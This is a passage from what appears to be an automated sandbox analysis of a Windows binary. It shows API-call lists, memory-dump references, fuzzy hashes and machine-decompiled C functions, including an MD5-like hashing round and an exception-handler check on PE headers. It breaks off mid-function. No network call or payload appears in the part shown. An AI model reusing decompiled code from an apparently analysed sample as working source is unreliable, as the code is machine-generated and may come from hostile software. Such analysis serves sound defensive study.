                                                        • StrToIntExA.SHLWAPI(00000000,00000000,01204540,?,01204540,69B25F44,?,?,69B25F44,01204540,?,69B25F44,E8FA7DD7,0120A00C,7742C740), ref: 01207368
                                                        • StrToIntExA.SHLWAPI(00000000,00000000,01204540,?,01204540,69B25F44,?,?,69B25F44,01204540,?,69B25F44,E8FA7DD7,0120A00C,7742C740), ref: 0120739A
                                                        • StrToIntExA.SHLWAPI(00000000,00000000,01204540,?,01204540,69B25F44,?,?,69B25F44,01204540,?,69B25F44,E8FA7DD7,0120A00C,7742C740), ref: 012073CC
                                                        • StrToIntExA.SHLWAPI(00000000,00000000,01204540,?,01204540,69B25F44,?,?,69B25F44,01204540,?,69B25F44,E8FA7DD7,0120A00C,7742C740), ref: 012073FE
                                                        • HeapFree.KERNEL32(00000000,?,?,01204540,69B25F44,?,?,69B25F44,01204540,?,69B25F44,E8FA7DD7,0120A00C,7742C740), ref: 012074A1
                                                        • HeapFree.KERNEL32(00000000,?,?,01204540,69B25F44,?,?,69B25F44,01204540,?,69B25F44,E8FA7DD7,0120A00C,7742C740), ref: 012074B4
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: FreeHeap
                                                        • String ID:
                                                        • API String ID: 3298025750-0
                                                        • Opcode ID: a3466c314cf49e4d2a374c3f04e71e1ffe2a6c071c0a92e08ed1de60c2153fb7
                                                        • Instruction ID: cfad5607fb632480d243a59a5f8e9ab44c92b75ad71297062501eaeb974b2300
                                                        • Opcode Fuzzy Hash: a3466c314cf49e4d2a374c3f04e71e1ffe2a6c071c0a92e08ed1de60c2153fb7
                                                        • Instruction Fuzzy Hash: D9719870A20216EFE723DBB8DC8DD6F7BB9FB48700B540B65A641D7187E671E9008B20
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 50%
                                                        			E01201754(void* __ecx, intOrPtr* _a4) {
                                                        				signed int _v8;
                                                        				signed int _v12;
                                                        				intOrPtr _v16;
                                                        				intOrPtr _v20;
                                                        				intOrPtr _v24;
                                                        				intOrPtr _v28;
                                                        				intOrPtr _v32;
                                                        				intOrPtr _v36;
                                                        				intOrPtr _v40;
                                                        				intOrPtr _v44;
                                                        				intOrPtr _v48;
                                                        				intOrPtr _v52;
                                                        				intOrPtr _v56;
                                                        				intOrPtr _v60;
                                                        				intOrPtr _v64;
                                                        				intOrPtr _v68;
                                                        				intOrPtr _v72;
                                                        				void _v76;
                                                        				intOrPtr* _t226;
                                                        				signed int _t229;
                                                        				signed int _t231;
                                                        				signed int _t233;
                                                        				signed int _t235;
                                                        				signed int _t237;
                                                        				signed int _t239;
                                                        				signed int _t241;
                                                        				signed int _t243;
                                                        				signed int _t245;
                                                        				signed int _t247;
                                                        				signed int _t249;
                                                        				signed int _t251;
                                                        				signed int _t253;
                                                        				signed int _t255;
                                                        				signed int _t257;
                                                        				signed int _t259;
                                                        				signed int _t274;
                                                        				signed int _t337;
                                                        				void* _t347;
                                                        				signed int _t348;
                                                        				signed int _t350;
                                                        				signed int _t352;
                                                        				signed int _t354;
                                                        				signed int _t356;
                                                        				signed int _t358;
                                                        				signed int _t360;
                                                        				signed int _t362;
                                                        				signed int _t364;
                                                        				signed int _t366;
                                                        				signed int _t375;
                                                        				signed int _t377;
                                                        				signed int _t379;
                                                        				signed int _t381;
                                                        				signed int _t383;
                                                        				intOrPtr* _t399;
                                                        				signed int _t407;
                                                        				signed int _t409;
                                                        				signed int _t411;
                                                        				signed int _t413;
                                                        				signed int _t415;
                                                        				signed int _t417;
                                                        				signed int _t419;
                                                        				signed int _t421;
                                                        				signed int _t423;
                                                        				signed int _t425;
                                                        				signed int _t427;
                                                        				signed int _t429;
                                                        				signed int _t437;
                                                        				signed int _t439;
                                                        				signed int _t441;
                                                        				signed int _t443;
                                                        				signed int _t445;
                                                        				void* _t447;
                                                        				signed int _t507;
                                                        				signed int _t598;
                                                        				signed int _t606;
                                                        				signed int _t612;
                                                        				signed int _t678;
                                                        				signed int* _t681;
                                                        				signed int _t682;
                                                        				signed int _t684;
                                                        				signed int _t689;
                                                        				signed int _t691;
                                                        				signed int _t696;
                                                        				signed int _t698;
                                                        				signed int _t717;
                                                        				signed int _t719;
                                                        				signed int _t721;
                                                        				signed int _t723;
                                                        				signed int _t725;
                                                        				signed int _t727;
                                                        				signed int _t733;
                                                        				signed int _t739;
                                                        				signed int _t741;
                                                        				signed int _t743;
                                                        				signed int _t745;
                                                        				signed int _t747;
                                                        
                                                        				_t226 = _a4;
                                                        				_t347 = __ecx + 2;
                                                        				_t681 =  &_v76;
                                                        				_t447 = 0x10;
                                                        				do {
                                                        					_t274 =  *(_t347 - 1) & 0x000000ff;
                                                        					_t347 = _t347 + 4;
                                                        					 *_t681 = (0 << 0x00000008 | _t274) << 0x00000008 |  *(_t347 - 6) & 0x000000ff;
                                                        					_t681 =  &(_t681[1]);
                                                        					_t447 = _t447 - 1;
                                                        				} while (_t447 != 0);
                                                        				_t6 = _t226 + 4; // 0x14eb3fc3
                                                        				_t682 =  *_t6;
                                                        				_t7 = _t226 + 8; // 0x8d08458b
                                                        				_t407 =  *_t7;
                                                        				_t8 = _t226 + 0xc; // 0x56c1184c
                                                        				_t348 =  *_t8;
                                                        				asm("rol eax, 0x7");
                                                        				_t229 = ( !_t682 & _t348 | _t407 & _t682) + _v76 +  *_t226 - 0x28955b88 + _t682;
                                                        				asm("rol ecx, 0xc");
                                                        				_t350 = ( !_t229 & _t407 | _t682 & _t229) + _v72 + _t348 - 0x173848aa + _t229;
                                                        				asm("ror edx, 0xf");
                                                        				_t409 = ( !_t350 & _t682 | _t350 & _t229) + _v68 + _t407 + 0x242070db + _t350;
                                                        				asm("ror esi, 0xa");
                                                        				_t684 = ( !_t409 & _t229 | _t350 & _t409) + _v64 + _t682 - 0x3e423112 + _t409;
                                                        				_v8 = _t684;
                                                        				_t689 = _v8;
                                                        				asm("rol eax, 0x7");
                                                        				_t231 = ( !_t684 & _t350 | _t409 & _v8) + _v60 + _t229 - 0xa83f051 + _t689;
                                                        				asm("rol ecx, 0xc");
                                                        				_t352 = ( !_t231 & _t409 | _t689 & _t231) + _v56 + _t350 + 0x4787c62a + _t231;
                                                        				asm("ror edx, 0xf");
                                                        				_t411 = ( !_t352 & _t689 | _t352 & _t231) + _v52 + _t409 - 0x57cfb9ed + _t352;
                                                        				asm("ror esi, 0xa");
                                                        				_t691 = ( !_t411 & _t231 | _t352 & _t411) + _v48 + _t689 - 0x2b96aff + _t411;
                                                        				_v8 = _t691;
                                                        				_t696 = _v8;
                                                        				asm("rol eax, 0x7");
                                                        				_t233 = ( !_t691 & _t352 | _t411 & _v8) + _v44 + _t231 + 0x698098d8 + _t696;
                                                        				asm("rol ecx, 0xc");
                                                        				_t354 = ( !_t233 & _t411 | _t696 & _t233) + _v40 + _t352 - 0x74bb0851 + _t233;
                                                        				asm("ror edx, 0xf");
                                                        				_t413 = ( !_t354 & _t696 | _t354 & _t233) + _v36 + _t411 - 0xa44f + _t354;
                                                        				asm("ror esi, 0xa");
                                                        				_t698 = ( !_t413 & _t233 | _t354 & _t413) + _v32 + _t696 - 0x76a32842 + _t413;
                                                        				_v8 = _t698;
                                                        				asm("rol eax, 0x7");
                                                        				_t235 = ( !_t698 & _t354 | _t413 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
                                                        				asm("rol ecx, 0xc");
                                                        				_t356 = ( !_t235 & _t413 | _v8 & _t235) + _v24 + _t354 - 0x2678e6d + _t235;
                                                        				_t507 =  !_t356;
                                                        				asm("ror edx, 0xf");
                                                        				_t415 = (_t507 & _v8 | _t356 & _t235) + _v20 + _t413 - 0x5986bc72 + _t356;
                                                        				_v12 = _t415;
                                                        				_v12 =  !_v12;
                                                        				asm("ror esi, 0xa");
                                                        				_t717 = (_v12 & _t235 | _t356 & _t415) + _v16 + _v8 + 0x49b40821 + _t415;
                                                        				asm("rol eax, 0x5");
                                                        				_t237 = (_t507 & _t415 | _t356 & _t717) + _v72 + _t235 - 0x9e1da9e + _t717;
                                                        				asm("rol ecx, 0x9");
                                                        				_t358 = (_v12 & _t717 | _t415 & _t237) + _v52 + _t356 - 0x3fbf4cc0 + _t237;
                                                        				asm("rol edx, 0xe");
                                                        				_t417 = ( !_t717 & _t237 | _t358 & _t717) + _v32 + _t415 + 0x265e5a51 + _t358;
                                                        				asm("ror esi, 0xc");
                                                        				_t719 = ( !_t237 & _t358 | _t417 & _t237) + _v76 + _t717 - 0x16493856 + _t417;
                                                        				asm("rol eax, 0x5");
                                                        				_t239 = ( !_t358 & _t417 | _t358 & _t719) + _v56 + _t237 - 0x29d0efa3 + _t719;
                                                        				asm("rol ecx, 0x9");
                                                        				_t360 = ( !_t417 & _t719 | _t417 & _t239) + _v36 + _t358 + 0x2441453 + _t239;
                                                        				asm("rol edx, 0xe");
                                                        				_t419 = ( !_t719 & _t239 | _t360 & _t719) + _v16 + _t417 - 0x275e197f + _t360;
                                                        				asm("ror esi, 0xc");
                                                        				_t721 = ( !_t239 & _t360 | _t419 & _t239) + _v60 + _t719 - 0x182c0438 + _t419;
                                                        				asm("rol eax, 0x5");
                                                        				_t241 = ( !_t360 & _t419 | _t360 & _t721) + _v40 + _t239 + 0x21e1cde6 + _t721;
                                                        				asm("rol ecx, 0x9");
                                                        				_t362 = ( !_t419 & _t721 | _t419 & _t241) + _v20 + _t360 - 0x3cc8f82a + _t241;
                                                        				asm("rol edx, 0xe");
                                                        				_t421 = ( !_t721 & _t241 | _t362 & _t721) + _v64 + _t419 - 0xb2af279 + _t362;
                                                        				asm("ror esi, 0xc");
                                                        				_t723 = ( !_t241 & _t362 | _t421 & _t241) + _v44 + _t721 + 0x455a14ed + _t421;
                                                        				asm("rol eax, 0x5");
                                                        				_t243 = ( !_t362 & _t421 | _t362 & _t723) + _v24 + _t241 - 0x561c16fb + _t723;
                                                        				asm("rol ecx, 0x9");
                                                        				_t364 = ( !_t421 & _t723 | _t421 & _t243) + _v68 + _t362 - 0x3105c08 + _t243;
                                                        				asm("rol edx, 0xe");
                                                        				_t423 = ( !_t723 & _t243 | _t364 & _t723) + _v48 + _t421 + 0x676f02d9 + _t364;
                                                        				asm("ror esi, 0xc");
                                                        				_t725 = ( !_t243 & _t364 | _t423 & _t243) + _v28 + _t723 - 0x72d5b376 + _t423;
                                                        				asm("rol eax, 0x4");
                                                        				_t245 = (_t364 ^ _t423 ^ _t725) + _v56 + _t243 - 0x5c6be + _t725;
                                                        				asm("rol ecx, 0xb");
                                                        				_t366 = (_t423 ^ _t725 ^ _t245) + _v44 + _t364 - 0x788e097f + _t245;
                                                        				asm("rol edx, 0x10");
                                                        				_t425 = (_t366 ^ _t725 ^ _t245) + _v32 + _t423 + 0x6d9d6122 + _t366;
                                                        				_t598 = _t366 ^ _t425;
                                                        				asm("ror esi, 0x9");
                                                        				_t727 = (_t598 ^ _t245) + _v20 + _t725 - 0x21ac7f4 + _t425;
                                                        				asm("rol eax, 0x4");
                                                        				_t247 = (_t598 ^ _t727) + _v72 + _t245 - 0x5b4115bc + _t727;
                                                        				asm("rol edi, 0xb");
                                                        				_t606 = (_t425 ^ _t727 ^ _t247) + _v60 + _t366 + 0x4bdecfa9 + _t247;
                                                        				asm("rol edx, 0x10");
                                                        				_t427 = (_t606 ^ _t727 ^ _t247) + _v48 + _t425 - 0x944b4a0 + _t606;
                                                        				_t337 = _t606 ^ _t427;
                                                        				asm("ror ecx, 0x9");
                                                        				_t375 = (_t337 ^ _t247) + _v36 + _t727 - 0x41404390 + _t427;
                                                        				asm("rol eax, 0x4");
                                                        				_t249 = (_t337 ^ _t375) + _v24 + _t247 + 0x289b7ec6 + _t375;
                                                        				asm("rol esi, 0xb");
                                                        				_t733 = (_t427 ^ _t375 ^ _t249) + _v76 + _t606 - 0x155ed806 + _t249;
                                                        				asm("rol edi, 0x10");
                                                        				_t612 = (_t733 ^ _t375 ^ _t249) + _v64 + _t427 - 0x2b10cf7b + _t733;
                                                        				_t429 = _t733 ^ _t612;
                                                        				asm("ror ecx, 0x9");
                                                        				_t377 = (_t429 ^ _t249) + _v52 + _t375 + 0x4881d05 + _t612;
                                                        				asm("rol eax, 0x4");
                                                        				_t251 = (_t429 ^ _t377) + _v40 + _t249 - 0x262b2fc7 + _t377;
                                                        				asm("rol edx, 0xb");
                                                        				_t437 = (_t612 ^ _t377 ^ _t251) + _v28 + _t733 - 0x1924661b + _t251;
                                                        				asm("rol esi, 0x10");
                                                        				_t739 = (_t437 ^ _t377 ^ _t251) + _v16 + _t612 + 0x1fa27cf8 + _t437;
                                                        				asm("ror ecx, 0x9");
                                                        				_t379 = (_t437 ^ _t739 ^ _t251) + _v68 + _t377 - 0x3b53a99b + _t739;
                                                        				asm("rol eax, 0x6");
                                                        				_t253 = (( !_t437 | _t379) ^ _t739) + _v76 + _t251 - 0xbd6ddbc + _t379;
                                                        				asm("rol edx, 0xa");
                                                        				_t439 = (( !_t739 | _t253) ^ _t379) + _v48 + _t437 + 0x432aff97 + _t253;
                                                        				asm("rol esi, 0xf");
                                                        				_t741 = (( !_t379 | _t439) ^ _t253) + _v20 + _t739 - 0x546bdc59 + _t439;
                                                        				asm("ror ecx, 0xb");
                                                        				_t381 = (( !_t253 | _t741) ^ _t439) + _v56 + _t379 - 0x36c5fc7 + _t741;
                                                        				asm("rol eax, 0x6");
                                                        				_t255 = (( !_t439 | _t381) ^ _t741) + _v28 + _t253 + 0x655b59c3 + _t381;
                                                        				asm("rol edx, 0xa");
                                                        				_t441 = (( !_t741 | _t255) ^ _t381) + _v64 + _t439 - 0x70f3336e + _t255;
                                                        				asm("rol esi, 0xf");
                                                        				_t743 = (( !_t381 | _t441) ^ _t255) + _v36 + _t741 - 0x100b83 + _t441;
                                                        				asm("ror ecx, 0xb");
                                                        				_t383 = (( !_t255 | _t743) ^ _t441) + _v72 + _t381 - 0x7a7ba22f + _t743;
                                                        				asm("rol eax, 0x6");
                                                        				_t257 = (( !_t441 | _t383) ^ _t743) + _v44 + _t255 + 0x6fa87e4f + _t383;
                                                        				asm("rol edx, 0xa");
                                                        				_t443 = (( !_t743 | _t257) ^ _t383) + _v16 + _t441 - 0x1d31920 + _t257;
                                                        				asm("rol esi, 0xf");
                                                        				_t745 = (( !_t383 | _t443) ^ _t257) + _v52 + _t743 - 0x5cfebcec + _t443;
                                                        				asm("ror edi, 0xb");
                                                        				_t678 = (( !_t257 | _t745) ^ _t443) + _v24 + _t383 + 0x4e0811a1 + _t745;
                                                        				asm("rol eax, 0x6");
                                                        				_t259 = (( !_t443 | _t678) ^ _t745) + _v60 + _t257 - 0x8ac817e + _t678;
                                                        				asm("rol edx, 0xa");
                                                        				_t445 = (( !_t745 | _t259) ^ _t678) + _v32 + _t443 - 0x42c50dcb + _t259;
                                                        				_t399 = _a4;
                                                        				asm("rol esi, 0xf");
                                                        				_t747 = (( !_t678 | _t445) ^ _t259) + _v68 + _t745 + 0x2ad7d2bb + _t445;
                                                        				 *_t399 =  *_t399 + _t259;
                                                        				asm("ror eax, 0xb");
                                                        				 *((intOrPtr*)(_t399 + 4)) = (( !_t259 | _t747) ^ _t445) + _v40 + _t678 - 0x14792c6f +  *((intOrPtr*)(_t399 + 4)) + _t747;
                                                        				 *((intOrPtr*)(_t399 + 8)) =  *((intOrPtr*)(_t399 + 8)) + _t747;
                                                        				 *((intOrPtr*)(_t399 + 0xc)) =  *((intOrPtr*)(_t399 + 0xc)) + _t445;
                                                        				return memset( &_v76, 0, 0x40);
                                                        			}

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: memset
                                                        • String ID:
                                                        • API String ID: 2221118986-0
                                                        • Opcode ID: fa325bdafb3c154772591fba5ceccab0c0e74e448f976aa4e7506c66901bd3b1
                                                        • Instruction ID: 6a3d12c70212685d94de078feb7460879e6a9d6aadc8d32a7263fa05e9c85a6e
                                                        • Opcode Fuzzy Hash: fa325bdafb3c154772591fba5ceccab0c0e74e448f976aa4e7506c66901bd3b1
                                                        • Instruction Fuzzy Hash: B522847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E01208055(long _a4) {
                                                        				intOrPtr _v8;
                                                        				intOrPtr _v12;
                                                        				signed int _v16;
                                                        				short* _v32;
                                                        				void _v36;
                                                        				void* _t57;
                                                        				signed int _t58;
                                                        				signed int _t61;
                                                        				signed int _t62;
                                                        				void* _t63;
                                                        				signed int* _t68;
                                                        				intOrPtr* _t69;
                                                        				intOrPtr* _t71;
                                                        				intOrPtr _t72;
                                                        				intOrPtr _t75;
                                                        				void* _t76;
                                                        				signed int _t77;
                                                        				void* _t78;
                                                        				void _t80;
                                                        				signed int _t81;
                                                        				signed int _t84;
                                                        				signed int _t86;
                                                        				short* _t87;
                                                        				void* _t89;
                                                        				signed int* _t90;
                                                        				long _t91;
                                                        				signed int _t93;
                                                        				signed int _t94;
                                                        				signed int _t100;
                                                        				signed int _t102;
                                                        				void* _t104;
                                                        				long _t108;
                                                        				signed int _t110;
                                                        
                                                        				_t108 = _a4;
                                                        				_t76 =  *(_t108 + 8);
                                                        				if((_t76 & 0x00000003) != 0) {
                                                        					L3:
                                                        					return 0;
                                                        				}
                                                        				_a4 =  *[fs:0x4];
                                                        				_v8 =  *[fs:0x8];
                                                        				if(_t76 < _v8 || _t76 >= _a4) {
                                                        					_t102 =  *(_t108 + 0xc);
                                                        					__eflags = _t102 - 0xffffffff;
                                                        					if(_t102 != 0xffffffff) {
                                                        						_t91 = 0;
                                                        						__eflags = 0;
                                                        						_a4 = 0;
                                                        						_t57 = _t76;
                                                        						do {
                                                        							_t80 =  *_t57;
                                                        							__eflags = _t80 - 0xffffffff;
                                                        							if(_t80 == 0xffffffff) {
                                                        								goto L9;
                                                        							}
                                                        							__eflags = _t80 - _t91;
                                                        							if(_t80 >= _t91) {
                                                        								L20:
                                                        								_t63 = 0;
                                                        								L60:
                                                        								return _t63;
                                                        							}
                                                        							L9:
                                                        							__eflags =  *(_t57 + 4);
                                                        							if( *(_t57 + 4) != 0) {
                                                        								_t12 =  &_a4;
                                                        								 *_t12 = _a4 + 1;
                                                        								__eflags =  *_t12;
                                                        							}
                                                        							_t91 = _t91 + 1;
                                                        							_t57 = _t57 + 0xc;
                                                        							__eflags = _t91 - _t102;
                                                        						} while (_t91 <= _t102);
                                                        						__eflags = _a4;
                                                        						if(_a4 == 0) {
                                                        							L15:
                                                        							_t81 =  *0x120a330; // 0x0
                                                        							_t110 = _t76 & 0xfffff000;
                                                        							_t58 = 0;
                                                        							__eflags = _t81;
                                                        							if(_t81 <= 0) {
                                                        								L18:
                                                        								_t104 = _t102 | 0xffffffff;
                                                        								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                                        								__eflags = _t61;
                                                        								if(_t61 < 0) {
                                                        									_t62 = 0;
                                                        									__eflags = 0;
                                                        								} else {
                                                        									_t62 = _a4;
                                                        								}
                                                        								__eflags = _t62;
                                                        								if(_t62 == 0) {
                                                        									L59:
                                                        									_t63 = _t104;
                                                        									goto L60;
                                                        								} else {
                                                        									__eflags = _v12 - 0x1000000;
                                                        									if(_v12 != 0x1000000) {
                                                        										goto L59;
                                                        									}
                                                        									__eflags = _v16 & 0x000000cc;
                                                        									if((_v16 & 0x000000cc) == 0) {
                                                        										L46:
                                                        										_t63 = 1;
                                                        										 *0x120a378 = 1;
                                                        										__eflags =  *0x120a378;
                                                        										if( *0x120a378 != 0) {
                                                        											goto L60;
                                                        										}
                                                        										_t84 =  *0x120a330; // 0x0
                                                        										__eflags = _t84;
                                                        										_t93 = _t84;
                                                        										if(_t84 <= 0) {
                                                        											L51:
                                                        											__eflags = _t93;
                                                        											if(_t93 != 0) {
                                                        												L58:
                                                        												 *0x120a378 = 0;
                                                        												goto L5;
                                                        											}
                                                        											_t77 = 0xf;
                                                        											__eflags = _t84 - _t77;
                                                        											if(_t84 <= _t77) {
                                                        												_t77 = _t84;
                                                        											}
                                                        											_t94 = 0;
                                                        											__eflags = _t77;
                                                        											if(_t77 < 0) {
                                                        												L56:
                                                        												__eflags = _t84 - 0x10;
                                                        												if(_t84 < 0x10) {
                                                        													_t86 = _t84 + 1;
                                                        													__eflags = _t86;
                                                        													 *0x120a330 = _t86;
                                                        												}
                                                        												goto L58;
                                                        											} else {
                                                        												do {
                                                        													_t68 = 0x120a338 + _t94 * 4;
                                                        													_t94 = _t94 + 1;
                                                        													__eflags = _t94 - _t77;
                                                        													 *_t68 = _t110;
                                                        													_t110 =  *_t68;
                                                        												} while (_t94 <= _t77);
                                                        												goto L56;
                                                        											}
                                                        										}
                                                        										_t69 = 0x120a334 + _t84 * 4;
                                                        										while(1) {
                                                        											__eflags =  *_t69 - _t110;
                                                        											if( *_t69 == _t110) {
                                                        												goto L51;
                                                        											}
                                                        											_t93 = _t93 - 1;
                                                        											_t69 = _t69 - 4;
                                                        											__eflags = _t93;
                                                        											if(_t93 > 0) {
                                                        												continue;
                                                        											}
                                                        											goto L51;
                                                        										}
                                                        										goto L51;
                                                        									}
                                                        									_t87 = _v32;
                                                        									__eflags =  *_t87 - 0x5a4d;
                                                        									if( *_t87 != 0x5a4d) {
                                                        										goto L59;
                                                        									}
                                                        									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                                        									__eflags =  *_t71 - 0x4550;
                                                        									if( *_t71 != 0x4550) {
                                                        										goto L59;
                                                        									}
                                                        									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                                        									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                                        										goto L59;
                                                        									}
                                                        									_t78 = _t76 - _t87;
                                                        									__eflags =  *((short*)(_t71 + 6));
                                                        									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                                        									if( *((short*)(_t71 + 6)) <= 0) {
                                                        										goto L59;
                                                        									}
                                                        									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                                        									__eflags = _t78 - _t72;
                                                        									if(_t78 < _t72) {
                                                        										goto L46;
                                                        									}
                                                        									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                                        									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                                        										goto L46;
                                                        									}
                                                        									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                                        									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                                        										goto L20;
                                                        									}
                                                        									goto L46;
                                                        								}
                                                        							} else {
                                                        								goto L16;
                                                        							}
                                                        							while(1) {
                                                        								L16:
                                                        								__eflags =  *((intOrPtr*)(0x120a338 + _t58 * 4)) - _t110;
                                                        								if( *((intOrPtr*)(0x120a338 + _t58 * 4)) == _t110) {
                                                        									break;
                                                        								}
                                                        								_t58 = _t58 + 1;
                                                        								__eflags = _t58 - _t81;
                                                        								if(_t58 < _t81) {
                                                        									continue;
                                                        								}
                                                        								goto L18;
                                                        							}
                                                        							__eflags = _t58;
                                                        							if(_t58 <= 0) {
                                                        								goto L5;
                                                        							}
                                                        							 *0x120a378 = 1;
                                                        							__eflags =  *0x120a378;
                                                        							if( *0x120a378 != 0) {
                                                        								goto L5;
                                                        							}
                                                        							__eflags =  *((intOrPtr*)(0x120a338 + _t58 * 4)) - _t110;
                                                        							if( *((intOrPtr*)(0x120a338 + _t58 * 4)) == _t110) {
                                                        								L32:
                                                        								_t100 = 0;
                                                        								__eflags = _t58;
                                                        								if(_t58 < 0) {
                                                        									L34:
                                                        									 *0x120a378 = 0;
                                                        									goto L5;
                                                        								} else {
                                                        									goto L33;
                                                        								}
                                                        								do {
                                                        									L33:
                                                        									_t90 = 0x120a338 + _t100 * 4;
                                                        									_t100 = _t100 + 1;
                                                        									__eflags = _t100 - _t58;
                                                        									 *_t90 = _t110;
                                                        									_t110 =  *_t90;
                                                        								} while (_t100 <= _t58);
                                                        								goto L34;
                                                        							}
                                                        							_t25 = _t81 - 1; // -1
                                                        							_t58 = _t25;
                                                        							__eflags = _t58;
                                                        							if(_t58 < 0) {
                                                        								L28:
                                                        								__eflags = _t81 - 0x10;
                                                        								if(_t81 < 0x10) {
                                                        									_t81 = _t81 + 1;
                                                        									__eflags = _t81;
                                                        									 *0x120a330 = _t81;
                                                        								}
                                                        								_t28 = _t81 - 1; // 0x0
                                                        								_t58 = _t28;
                                                        								goto L32;
                                                        							} else {
                                                        								goto L25;
                                                        							}
                                                        							while(1) {
                                                        								L25:
                                                        								__eflags =  *((intOrPtr*)(0x120a338 + _t58 * 4)) - _t110;
                                                        								if( *((intOrPtr*)(0x120a338 + _t58 * 4)) == _t110) {
                                                        									break;
                                                        								}
                                                        								_t58 = _t58 - 1;
                                                        								__eflags = _t58;
                                                        								if(_t58 >= 0) {
                                                        									continue;
                                                        								}
                                                        								break;
                                                        							}
                                                        							__eflags = _t58;
                                                        							if(__eflags >= 0) {
                                                        								if(__eflags == 0) {
                                                        									goto L34;
                                                        								}
                                                        								goto L32;
                                                        							}
                                                        							goto L28;
                                                        						}
                                                        						_t75 =  *((intOrPtr*)(_t108 - 8));
                                                        						__eflags = _t75 - _v8;
                                                        						if(_t75 < _v8) {
                                                        							goto L20;
                                                        						}
                                                        						__eflags = _t75 - _t108;
                                                        						if(_t75 >= _t108) {
                                                        							goto L20;
                                                        						}
                                                        						goto L15;
                                                        					}
                                                        					L5:
                                                        					_t63 = 1;
                                                        					goto L60;
                                                        				} else {
                                                        					goto L3;
                                                        				}
                                                        			}

                                                        APIs
                                                        • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 01208106
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: MemoryQueryVirtual
                                                        • String ID:
                                                        • API String ID: 2850889275-0
                                                        • Opcode ID: 3061c784f8016a43cbfd57c8c8849db8880e13bb9dd0cd84c6c181e3f0d5c56a
                                                        • Instruction ID: 8bcb3a2f437b5b428b7c35e9bd50fb799aeaf67cf568ff929fca9a98c2d4beb3
                                                        • Opcode Fuzzy Hash: 3061c784f8016a43cbfd57c8c8849db8880e13bb9dd0cd84c6c181e3f0d5c56a
                                                        • Instruction Fuzzy Hash: B461BE31E30A439FDB2BCB2DD48463B77A6EF85350B288729DA52C72C7E771D8428640
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 71%
                                                        			E01207E30(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                                        				intOrPtr _v8;
                                                        				char _v12;
                                                        				void* __ebp;
                                                        				signed int* _t43;
                                                        				char _t44;
                                                        				void* _t46;
                                                        				void* _t49;
                                                        				intOrPtr* _t53;
                                                        				void* _t54;
                                                        				void* _t65;
                                                        				long _t66;
                                                        				signed int* _t80;
                                                        				signed int* _t82;
                                                        				void* _t84;
                                                        				signed int _t86;
                                                        				void* _t89;
                                                        				void* _t95;
                                                        				void* _t96;
                                                        				void* _t99;
                                                        				void* _t106;
                                                        
                                                        				_t43 = _t84;
                                                        				_t65 = __ebx + 2;
                                                        				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                                        				_t89 = _t95;
                                                        				_t96 = _t95 - 8;
                                                        				_push(_t65);
                                                        				_push(_t84);
                                                        				_push(_t89);
                                                        				asm("cld");
                                                        				_t66 = _a8;
                                                        				_t44 = _a4;
                                                        				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                                        					_push(_t89);
                                                        					E01207F9B(_t66 + 0x10, _t66, 0xffffffff);
                                                        					_t46 = 1;
                                                        				} else {
                                                        					_v12 = _t44;
                                                        					_v8 = _a12;
                                                        					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                                        					_t86 =  *(_t66 + 0xc);
                                                        					_t80 =  *(_t66 + 8);
                                                        					_t49 = E01208055(_t66);
                                                        					_t99 = _t96 + 4;
                                                        					if(_t49 == 0) {
                                                        						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                                        						goto L11;
                                                        					} else {
                                                        						while(_t86 != 0xffffffff) {
                                                        							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                                        							if(_t53 == 0) {
                                                        								L8:
                                                        								_t80 =  *(_t66 + 8);
                                                        								_t86 = _t80[_t86 + _t86 * 2];
                                                        								continue;
                                                        							} else {
                                                        								_t54 =  *_t53();
